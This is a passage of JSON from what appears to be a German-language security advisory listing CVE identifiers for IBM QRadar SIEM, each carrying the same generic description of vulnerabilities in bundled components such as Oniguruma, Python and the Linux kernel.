Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-38457" }, { "cve": "CVE-2022-40133", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-40133" }, { "cve": "CVE-2022-40982", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-40982" }, { "cve": "CVE-2022-41858", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-41858" }, { "cve": "CVE-2022-42895", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-42895" }, { "cve": "CVE-2022-45869", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-45869" }, { "cve": "CVE-2022-45884", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-45884" }, { "cve": "CVE-2022-45887", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-45887" }, { "cve": "CVE-2022-45919", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-45919" }, { "cve": "CVE-2022-4744", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-4744" }, { "cve": "CVE-2022-48560", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-48560" }, { "cve": "CVE-2022-48564", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-48564" }, { "cve": "CVE-2022-48624", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-48624" }, { "cve": "CVE-2023-0458", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-0458" }, { "cve": "CVE-2023-0590", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-0590" }, { "cve": "CVE-2023-0597", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-0597" }, { "cve": "CVE-2023-1073", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1073" }, { "cve": "CVE-2023-1074", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1074" }, { "cve": "CVE-2023-1075", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1075" }, { "cve": "CVE-2023-1079", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1079" }, { "cve": "CVE-2023-1118", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1118" }, { "cve": "CVE-2023-1192", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1192" }, { "cve": "CVE-2023-1206", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1206" }, { "cve": "CVE-2023-1252", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1252" }, { "cve": "CVE-2023-1382", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1382" }, { "cve": "CVE-2023-1786", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1786" }, { "cve": "CVE-2023-1838", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1838" }, { "cve": "CVE-2023-1855", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1855" }, { "cve": "CVE-2023-1989", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1989" }, { "cve": "CVE-2023-1998", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen 